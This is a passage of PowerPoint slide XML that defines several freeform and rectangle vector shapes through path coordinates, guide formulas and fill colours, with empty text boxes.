                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10287" name="Freeform 368"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="7493000"/>
            <a:ext cx="28575" cy="112713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T28" fmla="*/ 0 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 50"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 5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50"/>
              <a:gd name="T59" fmla="*/ 12 w 12"/>
              <a:gd name="T60" fmla="*/ 50 h 5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50">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10288" name="Freeform 369"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1739900" y="7508875"/>
            <a:ext cx="20637" cy="80963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 0 h 36"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 0 h 36"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T26" fmla="*/ 0 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T28" fmla="*/ 0 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T30" fmla="*/ 0 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 0 h 36"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 0 h 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36"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>
              <a:gd name="T60" fmla="*/ 36 h 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36">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10289" name="Rectangle 370"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1462087" y="7488238"/>
            <a:ext cx="9525" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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290" name="Freeform 371"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1557337" y="7481888"/>
            <a:ext cx="103188" cy="123825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 0 w 46"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 0 w 46"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 0 w 46"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 0 w 46"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T81" fmla="*/ 0 h 55"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T83" fmla="*/ 0 h 55"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T85" fmla="*/ 0 h 55"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 46"/>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6"/>
              <a:gd name="T148" fmla="*/ 0 h 55"/>
              <a:gd name="T149" fmla="*/ 46 w 46"/>
              <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="999999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10291" name="Freeform 372"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="7573963"/>
            <a:ext cx="82550" cy="20637"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 0 h 9"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 9"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 9"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 9"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 9"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 9"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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9"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 9 h 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9">
                <a:moveTo>
                  <a:pt x="0" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
